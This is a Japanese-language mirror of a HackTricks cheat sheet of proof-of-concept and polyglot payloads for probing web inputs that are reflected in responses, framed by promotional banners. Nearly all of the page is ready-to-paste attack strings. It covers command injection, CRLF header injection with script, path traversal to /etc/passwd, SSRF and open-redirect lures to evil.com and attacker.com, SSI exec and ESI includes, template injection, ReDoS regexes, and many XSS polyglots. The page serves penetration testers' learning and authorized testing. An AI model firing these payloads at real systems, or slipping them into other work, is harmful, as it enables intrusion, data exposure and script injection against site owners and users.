mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
235 lines
13 KiB
Markdown
235 lines
13 KiB
Markdown
# 反射技術 - PoCsとPolygloths チートシート
|
||
|
||
<details>
|
||
|
||
<summary><strong>**ゼロからヒーローまでのAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
HackTricks をサポートする他の方法:
|
||
|
||
* **HackTricks で企業を宣伝**したい場合や **HackTricks をPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) をフォローする。
|
||
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||
|
||
</details>
|
||
|
||
これらのPoCsとPolyglothsの目的は、テスターに、**入力がレスポンスに反映される場合に悪用できる脆弱性の簡単な** **概要**を提供することです。
|
||
|
||
{% hint style="warning" %}
|
||
この **チートシートには各脆弱性の包括的なテストリストは提案されていません**。基本的なものだけです。より包括的なテストをお探しの場合は、提案された各脆弱性にアクセスしてください。
|
||
{% endhint %}
|
||
|
||
{% hint style="danger" %}
|
||
**XXEのようなContent-Typeに依存するインジェクション**は見つけることができません。通常、XMLデータを送信するリクエストを見つけた場合は、自分で試すことになります。また、ここでは **データベースインジェクション** も見つけることができません。一部のコンテンツが反映される場合でも、バックエンドのDB技術と構造に大きく依存します。
|
||
{% endhint %}
|
||
|
||
## Polygloths リスト
|
||
```python
|
||
{{7*7}}[7*7]
|
||
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
||
%0d%0aLocation:%20http://attacker.com
|
||
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
||
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
||
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
||
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
|
||
/etc/passwd
|
||
../../../../../../etc/hosts
|
||
..\..\..\..\..\..\etc/hosts
|
||
/etc/hostname
|
||
../../../../../../etc/hosts
|
||
C:/windows/system32/drivers/etc/hosts
|
||
../../../../../../windows/system32/drivers/etc/hosts
|
||
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
|
||
http://asdasdasdasd.burpcollab.com/mal.php
|
||
\\asdasdasdasd.burpcollab.com/mal.php
|
||
www.whitelisted.com
|
||
www.whitelisted.com.evil.com
|
||
https://google.com
|
||
//google.com
|
||
javascript:alert(1)
|
||
(\\w*)+$
|
||
([a-zA-Z]+)*$
|
||
((a+)+)+$
|
||
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
|
||
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||
" onclick=alert() a="
|
||
'"><img src=x onerror=alert(1) />
|
||
javascript:alert()
|
||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
||
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
|
||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||
```
|
||
## [クライアントサイドテンプレートインジェクション](../client-side-template-injection-csti.md)
|
||
|
||
### 基本的なテスト
|
||
```
|
||
{{7*7}}
|
||
[7*7]
|
||
```
|
||
### ポリグロット
|
||
```bash
|
||
{{7*7}}[7*7]
|
||
```
|
||
## [コマンドインジェクション](../command-injection.md)
|
||
|
||
### 基本テスト
|
||
```bash
|
||
;ls
|
||
||ls;
|
||
|ls;
|
||
&&ls;
|
||
&ls;
|
||
%0Als
|
||
`ls`
|
||
$(ls)
|
||
```
|
||
### ポリグロット
|
||
```bash
|
||
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
||
```
|
||
## [CRLF](../crlf-0d-0a.md)
|
||
|
||
### 基本テスト
|
||
```bash
|
||
%0d%0aLocation:%20http://attacker.com
|
||
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
||
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
||
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
||
```
|
||
## ダングリングマークアップ
|
||
|
||
### 基本テスト
|
||
```markup
|
||
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
|
||
```
|
||
## [ファイルインクルージョン/パストラバーサル](../file-inclusion/)
|
||
|
||
### 基本テスト
|
||
```bash
|
||
/etc/passwd
|
||
../../../../../../etc/hosts
|
||
..\..\..\..\..\..\etc/hosts
|
||
/etc/hostname
|
||
../../../../../../etc/hosts
|
||
C:/windows/system32/drivers/etc/hosts
|
||
../../../../../../windows/system32/drivers/etc/hosts
|
||
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
|
||
http://asdasdasdasd.burpcollab.com/mal.php
|
||
\\asdasdasdasd.burpcollab.com/mal.php
|
||
```
|
||
## [オープンリダイレクト](../open-redirect.md) / [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/)
|
||
|
||
### 基本的なテスト
|
||
```bash
|
||
www.whitelisted.com
|
||
www.whitelisted.com.evil.com
|
||
https://google.com
|
||
//google.com
|
||
javascript:alert(1)
|
||
```
|
||
## [ReDoS](../regular-expression-denial-of-service-redos.md)
|
||
|
||
### 基本テスト
|
||
```bash
|
||
(\\w*)+$
|
||
([a-zA-Z]+)*$
|
||
((a+)+)+$
|
||
```
|
||
## [サーバーサイドインクルージョン/エッジサイドインクルージョン](../server-side-inclusion-edge-side-inclusion-injection.md)
|
||
|
||
### 基本テスト
|
||
```markup
|
||
<!--#echo var="DATE_LOCAL" -->
|
||
<!--#exec cmd="ls" -->
|
||
<esi:include src=http://attacker.com/>
|
||
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||
```
|
||
### ポリグロット
|
||
```markup
|
||
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||
```
|
||
## [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/)
|
||
|
||
オープンリダイレクトに使用されるテストと同じものがここでも使用できます。
|
||
|
||
## [サーバーサイドテンプレートインジェクション](../ssti-server-side-template-injection/)
|
||
|
||
### 基本的なテスト
|
||
```markup
|
||
${{<%[%'"}}%\
|
||
{{7*7}}
|
||
${7*7}
|
||
<%= 7*7 %>
|
||
${{7*7}}
|
||
#{7*7}
|
||
```
|
||
### ポリグロット
|
||
```python
|
||
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
|
||
```
|
||
## [XSLTサーバーサイドインジェクション](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
|
||
|
||
### 基本テスト
|
||
```markup
|
||
<xsl:value-of select="system-property('xsl:version')" />
|
||
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||
```
|
||
### ポリグロット
|
||
```markup
|
||
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||
```
|
||
## XSS
|
||
|
||
### 基本テスト
|
||
```markup
|
||
" onclick=alert() a="
|
||
'"><img src=x onerror=alert(1) />
|
||
javascript:alert()
|
||
```
|
||
### ポリグロット
|
||
```markup
|
||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
|
||
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
|
||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
|
||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
|
||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
|
||
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
|
||
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
|
||
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
|
||
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
|
||
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
|
||
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
|
||
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
|
||
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
|
||
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
|
||
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
|
||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
|
||
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
|
||
<svg%0Ao%00nload=%09((pro\u006dpt))()//
|
||
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
|
||
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
|
||
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
|
||
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
|
||
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
|
||
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
|
||
```
|
||
<details>
|
||
|
||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
HackTricksをサポートする他の方法:
|
||
|
||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする**
|
||
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
|
||
|
||
</details>
|